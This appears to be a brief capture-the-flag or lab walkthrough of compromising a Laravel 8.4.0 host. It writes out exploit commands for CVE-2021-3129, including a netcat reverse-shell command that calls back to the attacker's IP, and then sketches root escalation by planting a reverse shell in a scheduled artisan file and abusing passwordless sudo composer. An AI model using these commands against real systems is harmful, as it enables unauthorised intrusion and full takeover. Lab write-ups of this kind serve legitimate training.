80
When visiting non-existent web pages:
It's running Laravel 8.4.0
Using this exploit:
git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
cd CVE-2021-3129
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txtChecking the chains available:
python3 CVE-2021-3129.py --chains
Trying RCE2:
python3 CVE-2021-3129.py --host http://192.168.155.38/ --exec 'busybox nc 192.168.45.223 80 -e bash' --chain Laravel/RCE2Now run a listener:
pen 80
We get a shell.
Running linpeas we can find that skunk is in sudo group. 
Running pspy64:
We have a file running called artisan: 
Now putting a reverse shell in it
From pentestmonkey.
Start a listener:
penelope.py 8000
Running sudo -l: 
We can run composer without password.
Now in /var/www/html/lavita edit composer.json WITH SHELL AS WWW-DATA:
Now run command:
We get a root shell: 
Last updated
Was this helpful?